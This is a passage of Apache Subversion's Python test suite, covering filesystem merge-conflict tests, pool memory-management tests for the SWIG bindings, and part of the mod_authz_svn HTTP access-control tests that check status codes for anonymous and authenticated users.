SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/G/xi",
"This is the file 'xi'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# (2) E exists in both ANCESTOR and A, but refers to different
# revisions of the same node.
# (1a) E exists in both ANCESTOR and B, but refers to different
# revisions of the same file node. Conflict.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
svn_test__set_file_contents(txn_root, "A/B/lambda",
"A different change to 'lambda'.\n")
after_rev = self.check_commit_txn(txn, "/A/B/lambda")
fs.abort_txn(txn)
# (1b) E exists in both ANCESTOR and B, but refers to different
# revisions of the same directory node. Merge A/E and B/E,
# recursively. Succeed, because no conflict beneath E.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.make_file(txn_root, "A/D/G/nu")
svn_test__set_file_contents(txn_root, "A/D/G/nu",
"This is the file 'nu'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 13
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"A new file 'mu'.\n"),
SubversionTestTreeEntry("A/sigma",
"This is the file 'sigma'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"Change to file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is the file 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/G/xi",
"This is the file 'xi'.\n"),
SubversionTestTreeEntry("A/D/G/nu",
"This is the file 'nu'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# (1c) E exists in both ANCESTOR and B, but refers to different
# revisions of the same directory node. Merge A/E and B/E,
# recursively. Fail, because conflict beneath E.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
fs.make_file(txn_root, "A/D/G/xi")
svn_test__set_file_contents(txn_root, "A/D/G/xi",
"This is a different file 'xi'.\n")
after_rev = self.check_commit_txn(txn, "/A/D/G/xi")
fs.abort_txn(txn)
# (1) E exists in both ANCESTOR and B, and refers to the same node
# revision. Replace E with A's node revision.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
old_lambda_ctnts = svn_test__get_file_contents(txn_root, "A/B/lambda")
if (not isinstance(old_lambda_ctnts, str)
or old_lambda_ctnts != "This is the file 'lambda'.\n"):
raise core.SubversionException(
"got wrong contents from an old revision tree",
core.SVN_ERR_FS_GENERAL)
svn_test__set_file_contents(txn_root, "A/D/G/rho",
"This is an irrelevant change to 'rho'.\n")
after_rev = self.check_commit_txn(txn, None)
########################################################################
# REVISION 14
########################################################################
expected_entries = [
# path, contents (None = dir)
SubversionTestTreeEntry("theta",
"This is the file 'theta'.\n"),
SubversionTestTreeEntry("A", None),
SubversionTestTreeEntry("A/mu",
"A new file 'mu'.\n"),
SubversionTestTreeEntry("A/sigma",
"This is the file 'sigma'.\n"),
SubversionTestTreeEntry("A/B", None),
SubversionTestTreeEntry("A/B/lambda",
"Change to file 'lambda'.\n"),
SubversionTestTreeEntry("A/B/E", None),
SubversionTestTreeEntry("A/B/E/alpha",
"This is the file 'alpha'.\n"),
SubversionTestTreeEntry("A/B/E/beta",
"This is the file 'beta'.\n"),
SubversionTestTreeEntry("A/B/F", None),
SubversionTestTreeEntry("A/C", None),
SubversionTestTreeEntry("A/C/kappa",
"This is the file 'kappa'.\n"),
SubversionTestTreeEntry("A/D", None),
SubversionTestTreeEntry("A/D/gamma",
"This is the file 'gamma'.\n"),
SubversionTestTreeEntry("A/D/G", None),
SubversionTestTreeEntry("A/D/G/pi",
"This is the file 'pi'.\n"),
SubversionTestTreeEntry("A/D/G/rho",
"This is an irrelevant change to 'rho'.\n"),
SubversionTestTreeEntry("A/D/G/tau",
"This is the file 'tau'.\n"),
SubversionTestTreeEntry("A/D/G/xi",
"This is the file 'xi'.\n"),
SubversionTestTreeEntry("A/D/G/nu",
"This is the file 'nu'.\n"),
SubversionTestTreeEntry("A/D/I", None),
SubversionTestTreeEntry("A/D/I/delta",
"This is the file 'delta'.\n"),
SubversionTestTreeEntry("A/D/I/epsilon",
"This is the file 'epsilon'.\n")]
revision_root = fs.revision_root(test_fs, after_rev)
svn_test__validate_tree(revision_root, expected_entries)
revisions[revision_count] = after_rev
revision_count += 1
# (1) E exists in both ANCESTOR and A, and refers to the same node
# revision.
# (1) E exists in both ANCESTOR and B, and refers to the same
# node revision. Nothing has happened to ANCESTOR/E, so no
# change is necessary.
# This has now been tested about fifty-four trillion times. We
# don't need to test it again here.
# E exists in ANCESTOR, but has been deleted from A. E exists in
# both ANCESTOR and B but refers to different revisions of the same
# node. Conflict.
txn = fs.begin_txn2(test_fs, revisions[1], 0)
txn_root = fs.txn_root(txn)
svn_test__set_file_contents(txn_root, "iota",
"New contents for 'iota'.\n")
after_rev = self.check_commit_txn(txn, "/iota")
fs.abort_txn(txn)
return
def suite():
return unittest.defaultTestLoader.loadTestsFromTestCase(
SubversionFSTestCase)
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
```
#### File: python/tests/pool.py
```python
import unittest, weakref, setup_path
import os, tempfile, gc
import svn.core, svn.client, libsvn.core
from svn.core import *
from libsvn.core import application_pool, GenericSWIGWrapper
import utils
# Test case for the new automatic pool management infrastructure
class PoolTestCase(unittest.TestCase):
def assertNotNone(self, value):
"""Assert that the specified value is not None"""
return self.assertNotEqual(value, None)
def assertNone(self, value):
"""Assert that the specified value is None"""
return self.assertEqual(value, None)
def test_object_struct_members(self):
"""Check that object struct members work correctly"""
# Test good object assignment operations
client_ctx = svn.client.svn_client_create_context()
auth = svn.core.svn_auth_open([])
client_ctx.auth_baton = auth
# Check that parent pools are set correctly on struct accesses
self.assertEqual(client_ctx.auth_baton._parent_pool, auth._parent_pool)
# Test bad object assignment operations
def test_bad_assignment(self):
head_revision = svn.core.svn_opt_revision_t()
head_revision.kind = auth
self.assertRaises(TypeError, test_bad_assignment)
def test_object_hash_struct_members(self):
"""Check that struct members which are hashes of objects work correctly"""
cfg = svn.core.svn_config_create(False)
client_ctx = svn.client.svn_client_create_context()
category = svn.core.SVN_CONFIG_CATEGORY_SERVERS
client_ctx.config = { category: cfg }
# Check that parent pools are set correctly
self.assertEqual(client_ctx.config[category]._parent_pool,
cfg._parent_pool)
# Test invalid assignment
def test_bad_assignment(self):
client_ctx.config = 42
self.assertRaises(TypeError, test_bad_assignment)
def test_assert_valid(self):
"""Test assert_valid method on proxy objects"""
# Test assert_valid with destroy()
client_ctx = svn.client.svn_client_create_context()
auth = svn.core.svn_auth_open([])
wrapped_auth = GenericSWIGWrapper(auth, auth._parent_pool)
client_ctx.auth_baton = auth
auth.assert_valid()
wrapped_auth.assert_valid()
client_ctx.auth_baton.assert_valid()
auth._parent_pool.destroy()
self.assertRaises(AssertionError, lambda: auth.assert_valid())
self.assertRaises(AssertionError, lambda: wrapped_auth.assert_valid())
self.assertRaises(AssertionError, lambda: client_ctx.auth_baton)
# Test assert_valid with clear()
client_ctx = svn.client.svn_client_create_context()
auth = svn.core.svn_auth_open([])
wrapped_auth = GenericSWIGWrapper(auth, auth._parent_pool)
client_ctx.auth_baton = auth
auth.assert_valid()
wrapped_auth.assert_valid()
client_ctx.auth_baton.assert_valid()
auth._parent_pool.clear()
self.assertRaises(AssertionError, lambda: auth.assert_valid())
self.assertRaises(AssertionError, lambda: wrapped_auth.assert_valid())
self.assertRaises(AssertionError, lambda: client_ctx.auth_baton)
def test_integer_struct_members(self):
"""Check that integer struct members work correctly"""
# Test good integer assignment operations
rev = svn.core.svn_opt_revision_t()
rev.kind = svn.core.svn_opt_revision_number
rev.value.number = 10
self.assertEqual(rev.kind, svn.core.svn_opt_revision_number)
self.assertEqual(rev.value.number, 10)
# Test bad integer assignment operations
def test_bad_assignment(self):
client_ctx = svn.client.svn_client_create_context()
client_ctx.config = 2
self.assertRaises(TypeError, test_bad_assignment)
def test_pool(self):
# Create pools
parent_pool = Pool()
parent_pool_ref = weakref.ref(parent_pool)
pool = Pool(Pool(parent_pool))
pool = Pool(pool)
# Make sure proper exceptions are raised with incorrect input
self.assertRaises(TypeError, lambda: Pool("abcd"))
# Check that garbage collection is working OK
self.assertNotNone(parent_pool_ref())
top_pool_ref = weakref.ref(parent_pool._parent_pool)
del parent_pool
self.assertNotNone(parent_pool_ref())
self.assertNotNone(top_pool_ref())
pool.clear()
newpool = libsvn.core.svn_pool_create(pool)
libsvn.core.apr_pool_destroy(newpool)
self.assertNotNone(newpool)
pool.clear()
self.assertNotNone(parent_pool_ref())
del pool
self.assertNotNone(parent_pool_ref())
del newpool
self.assertNone(parent_pool_ref())
self.assertNone(top_pool_ref())
# Make sure anonymous pools are destroyed properly
anonymous_pool_ref = weakref.ref(Pool())
self.assertNone(anonymous_pool_ref())
def test_compatibility_layer(self):
# Create a new pool
pool = Pool()
parent_pool_ref = weakref.ref(pool)
pool = svn_pool_create(Pool(pool))
pool_ref = weakref.ref(pool)
# Make sure proper exceptions are raised with incorrect input
self.assertRaises(TypeError, lambda: svn_pool_create("abcd"))
# Test whether pools are destroyed properly
pool = svn_pool_create(pool)
self.assertNotNone(pool_ref())
self.assertNotNone(parent_pool_ref())
del pool
self.assertNone(pool_ref())
self.assertNone(parent_pool_ref())
# Ensure that AssertionErrors are raised when a pool is deleted twice
newpool = Pool()
newpool2 = Pool(newpool)
svn_pool_clear(newpool)
self.assertRaises(AssertionError, lambda: libsvn.core.apr_pool_destroy(newpool2))
self.assertRaises(AssertionError, lambda: svn_pool_destroy(newpool2))
svn_pool_destroy(newpool)
self.assertRaises(AssertionError, lambda: svn_pool_destroy(newpool))
# Try to allocate memory from a destroyed pool
self.assertRaises(AssertionError, lambda: svn_pool_create(newpool))
# Create and destroy a pool
svn_pool_destroy(svn_pool_create())
# Make sure anonymous pools are destroyed properly
anonymous_pool_ref = weakref.ref(svn_pool_create())
self.assertNone(anonymous_pool_ref())
# Try to cause a segfault using apr_terminate
svn.core.apr_terminate()
svn.core.apr_initialize()
svn.core.apr_terminate()
svn.core.apr_terminate()
# Destroy the application pool
svn_pool_destroy(libsvn.core.application_pool)
# Double check that the application pool has been deleted
self.assertNone(libsvn.core.application_pool)
# Try to allocate memory from the old application pool
self.assertRaises(AssertionError, lambda: svn_pool_create(application_pool))
# Bring the application pool back to life
svn_pool_create()
# Double check that the application pool has been created
self.assertNotNone(libsvn.core.application_pool)
# We can still destroy and create pools at will
svn_pool_destroy(svn_pool_create())
def _test_pools_in_circular_reference(self, finalizer=False):
class Circular(object):
def __init__(self, pool):
self.pool = pool
self.loop = None
if finalizer:
def __del__(self):
self.pool = self.loop = None
def create_circularl():
pool = Pool(libsvn.core.application_pool)
subpool1 = Pool(pool)
subpool2 = Pool(pool)
circularly1 = Circular(pool)
circularly2 = Circular(subpool2)
circularly3 = Circular(subpool1)
circularly1.loop = circularly3
circularly2.loop = circularly1
circularly3.loop = circularly2
refs = weakref.WeakValueDictionary()
refs['pool'] = pool
refs['subpool1'] = subpool1
refs['subpool2'] = subpool2
return refs
refs = create_circularl()
self.assertEqual({'pool', 'subpool1', 'subpool2'},
set(name for name, pool in refs.items()
if pool is not None))
gc.collect()
self.assertEqual(set(), set(name for name, pool in refs.items()
if pool is not None))
def test_pools_in_circular_reference_without_finalizer(self):
self._test_pools_in_circular_reference(finalizer=False)
@unittest.skipIf(not utils.IS_PY3,
"Python 2 cannot collect garbage which involves circular "
"references with finalizer")
def test_pools_in_circular_reference_with_finalizer(self):
self._test_pools_in_circular_reference(finalizer=True)
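# Editorial note, not part of the original suite: the circular-reference tests
# above use weakref.WeakValueDictionary purely as an observer -- once
# gc.collect() has broken the Circular <-> Pool reference cycles, the pool
# entries drop out of `refs`, which is exactly what the final assertEqual
# verifies.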
def suite():
return unittest.defaultTestLoader.loadTestsFromTestCase(PoolTestCase)
if __name__ == '__main__':
runner = unittest.TextTestRunner()
runner.run(suite())
```
#### File: tests/cmdline/mod_authz_svn_tests.py
```python
import os, re, logging, shutil
logger = logging.getLogger()
# Our testing module
import svntest
# (abbreviation)
Skip = svntest.testcase.Skip_deco
SkipUnless = svntest.testcase.SkipUnless_deco
XFail = svntest.testcase.XFail_deco
Issues = svntest.testcase.Issues_deco
Issue = svntest.testcase.Issue_deco
Wimp = svntest.testcase.Wimp_deco
ls_of_D_no_H = '''<html><head><title>repos - Revision 1: /A/D</title></head>
<body>
<h2>repos - Revision 1: /A/D</h2>
<ul>
<li><a href="../">..</a></li>
<li><a href="G/">G/</a></li>
<li><a href="gamma">gamma</a></li>
</ul>
</body></html>'''
ls_of_D_H = '''<html><head><title>repos - Revision 1: /A/D</title></head>
<body>
<h2>repos - Revision 1: /A/D</h2>
<ul>
<li><a href="../">..</a></li>
<li><a href="G/">G/</a></li>
<li><a href="H/">H/</a></li>
<li><a href="gamma">gamma</a></li>
</ul>
</body></html>'''
ls_of_H = '''<html><head><title>repos - Revision 1: /A/D/H</title></head>
<body>
<h2>repos - Revision 1: /A/D/H</h2>
<ul>
<li><a href="../">..</a></li>
<li><a href="chi">chi</a></li>
<li><a href="omega">omega</a></li>
<li><a href="psi">psi</a></li>
</ul>
</body></html>'''
user1 = svntest.main.wc_author
user1_upper = user1.upper()
user1_pass = svntest.main.wc_passwd
user1_badpass = '<PASSWORD>'
assert user1_pass != user1_badpass, "Passwords can't match"
user2 = svntest.main.wc_author2
user2_upper = user2.upper()
user2_pass = svntest.main.wc_passwd
user2_badpass = '<PASSWORD>'
assert user2_pass != user2_badpass, "Passwords can't match"
def write_authz_file(sbox):
svntest.main.write_authz_file(sbox, {
'/': '$anonymous = r\n' +
'jrandom = rw\n' +
'jconstant = rw',
'/A/D/H': '$anonymous =\n' +
'$authenticated =\n' +
'jrandom = rw'
})
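# Editorial note, not part of the original suite: with the rules above,
# anonymous users can read everything except /A/D/H, jrandom (user1 in these
# tests) keeps read/write access everywhere including /A/D/H, and jconstant
# (user2) has read/write access everywhere except /A/D/H.  This access matrix
# is what the HTTP status expectations in the tests below are built around.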
def write_authz_file_groups(sbox):
authz_name = sbox.authz_name()
svntest.main.write_authz_file(sbox,{
'/': '* =',
})
def verify_get(test_area_url, path, user, pw,
expected_status, expected_body, headers):
import base64
req_url = test_area_url + path
h = svntest.main.create_http_connection(req_url, 0)
if headers is None:
headers = {}
if user and pw:
auth_info = user + ':' + pw
user_pw = base64.b64encode(auth_info.encode()).decode()
headers['Authorization'] = 'Basic ' + user_pw
else:
auth_info = "anonymous"
h.request('GET', req_url, None, headers)
r = h.getresponse()
actual_status = r.status
if expected_status and expected_status != actual_status:
logger.warn("Expected status '" + str(expected_status) +
"' but got '" + str(actual_status) +
"' on url '" + req_url + "' (" +
auth_info + ").")
raise svntest.Failure
if expected_body:
actual_body = r.read()
if isinstance(expected_body, str) and not isinstance(actual_body, str):
actual_body = actual_body.decode()
if expected_body != actual_body:
logger.warn("Expected body:")
logger.warn(expected_body)
logger.warn("But got:")
logger.warn(actual_body)
logger.warn("on url '" + req_url + "' (" + auth_info + ").")
raise svntest.Failure
def verify_gets(test_area_url, tests):
for test in tests:
verify_get(test_area_url, test['path'], test.get('user'), test.get('pw'),
test['status'], test.get('body'), test.get('headers'))
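# Editorial sketch, not part of the original test suite: each entry passed to
# verify_gets() is a plain dict in which only 'path' and 'status' are
# required; 'user', 'pw', 'body' and 'headers' default to None via dict.get().
# The hypothetical helper below (never called by the suite) shows the minimal
# shape of such a table.
def _example_verify_gets_usage(test_area_url):
  example_tests = (
    { 'path': '/repos/', 'status': 200 },
    { 'path': '/repos/A/D/H', 'status': 403, 'user': user1, 'pw': user1_pass },
  )
  verify_gets(test_area_url, example_tests)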
######################################################################
# Tests
#
# Each test must return on success or raise on failure.
#----------------------------------------------------------------------
@SkipUnless(svntest.main.is_ra_type_dav)
def anon(sbox):
"test anonymous access"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/anon')
write_authz_file(sbox)
anon_tests = (
{ 'path': '', 'status': 301 },
{ 'path': '/', 'status': 200 },
{ 'path': '/repos', 'status': 301 },
{ 'path': '/repos/', 'status': 200 },
{ 'path': '/repos/A', 'status': 301 },
{ 'path': '/repos/A/', 'status': 200 },
{ 'path': '/repos/A/D', 'status': 301 },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H },
{ 'path': '/repos/A/D/gamma', 'status': 200 },
{ 'path': '/repos/A/D/H', 'status': 403 },
{ 'path': '/repos/A/D/H/', 'status': 403 },
{ 'path': '/repos/A/D/H/chi', 'status': 403 },
# auth isn't configured so nothing should change when passing
# authn details
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user1, 'pw': user1_pass},
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user1, 'pw': user1_badpass},
{ 'path': '', 'status': 301, 'user': user2, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_badpass},
)
verify_gets(test_area_url, anon_tests)
@SkipUnless(svntest.main.is_ra_type_dav)
def mixed(sbox):
"test mixed anonymous and authenticated access"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/mixed')
write_authz_file(sbox)
mixed_tests = (
{ 'path': '', 'status': 301, },
{ 'path': '/', 'status': 200, },
{ 'path': '/repos', 'status': 301, },
{ 'path': '/repos/', 'status': 200, },
{ 'path': '/repos/A', 'status': 301, },
{ 'path': '/repos/A/', 'status': 200, },
{ 'path': '/repos/A/D', 'status': 301, },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
},
{ 'path': '/repos/A/D/gamma', 'status': 200, },
{ 'path': '/repos/A/D/H', 'status': 401, },
{ 'path': '/repos/A/D/H/', 'status': 401, },
{ 'path': '/repos/A/D/H/chi', 'status': 401, },
# auth is configured and user1 is allowed access to H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass},
# try with the wrong password for user1
{ 'path': '', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user1, 'pw': user1_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user1, 'pw': user1_badpass},
# auth is configured and user2 is not allowed access to H
{ 'path': '', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/', 'status': 403, 'user': user2, 'pw': user2_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 403, 'user': user2, 'pw': user2_pass},
# try with the wrong password for user2
{ 'path': '', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/gamma', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/', 'status': 401, 'user': user2, 'pw': user2_badpass},
{ 'path': '/repos/A/D/H/chi', 'status': 401, 'user': user2, 'pw': user2_badpass},
)
verify_gets(test_area_url, mixed_tests)
@SkipUnless(svntest.main.is_ra_type_dav)
@XFail(svntest.main.is_httpd_authz_provider_enabled)
# uses the AuthzSVNNoAuthWhenAnonymousAllowed On directive
# this is broken with httpd 2.3.x+ since it requires the auth system to accept
# r->user == NULL and there is a test for this in server/request.c now. It
# was intended as a workaround for the lack of Satisfy Any in 2.3.x+ which
# was resolved by httpd with mod_access_compat in 2.3.x+.
def mixed_noauthwhenanon(sbox):
"test mixed with noauthwhenanon directive"
sbox.build(read_only = True, create_wc = False)
test_area_url = sbox.repo_url.replace('/svn-test-work/local_tmp/repos',
'/authz-test-work/mixed-noauthwhenanon')
write_authz_file(sbox)
noauthwhenanon_tests = (
{ 'path': '', 'status': 301, },
{ 'path': '/', 'status': 200, },
{ 'path': '/repos', 'status': 301, },
{ 'path': '/repos/', 'status': 200, },
{ 'path': '/repos/A', 'status': 301, },
{ 'path': '/repos/A/', 'status': 200, },
{ 'path': '/repos/A/D', 'status': 301, },
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_no_H,
},
{ 'path': '/repos/A/D/gamma', 'status': 200, },
{ 'path': '/repos/A/D/H', 'status': 401, },
{ 'path': '/repos/A/D/H/', 'status': 401, },
{ 'path': '/repos/A/D/H/chi', 'status': 401, },
# auth is configured and user1 is allowed access to H
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/', 'status': 200, 'body': ls_of_D_H,
'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/gamma', 'status': 200, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H', 'status': 301, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/', 'status': 200, 'body': ls_of_H, 'user': user1, 'pw': user1_pass},
{ 'path': '/repos/A/D/H/chi', 'status': 200, 'user': user1, 'pw': user1_pass},
# try with the wrong password for user1
# note that unlike doing this with Satisfy Any this case
# actually provides anon access when provided with an invalid
# password
{ 'path': '', 'status': 301, 'user': user1, 'pw': user1_badpass},
